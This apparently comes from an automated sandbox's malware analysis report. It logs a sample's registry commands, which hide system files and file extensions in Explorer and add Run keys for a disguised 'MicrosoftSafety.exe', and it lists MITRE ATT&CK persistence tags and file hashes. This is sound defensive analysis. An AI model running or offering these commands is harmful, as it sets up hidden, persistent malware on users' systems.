C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
104KB
MD5ecea035951694789b7184c14e9af81f6
SHA109ac039ded11ba32c2a481cd51cab3af1d11669d
SHA2563ae6b1db7c6ff2fde1abd5f707c51f7d737a58820c28461583b510b66b0bb7b1
SHA51244439f93c4da0b4b623555c4a7006e319814a8a49a7eafa441d8c96304f621b9eca143f4c1af8574f41741e19e88cf4fb1f63ecc8b7785d59c59151f9644f1ce
-
Filesize
87B
MD5a58e87ffeec377bdfe74aa489e222618
SHA1ce4755bf320611f95b2e6fd8128a95d22b2680da
SHA256fd5ee8d0b5bfe9e3d8e7088253d80602c554d62d2ee69ad9270722c251d6eff0
SHA5121e5cf2c04ecc7e16dd26020c73a8a47059cce08f8224632621818d62dd00f928a1829e385db4cfbda1dc438dcc1187903556dd483d5786ebe6cfad915a459c66
-
Filesize
132KB
-
Filesize
132KB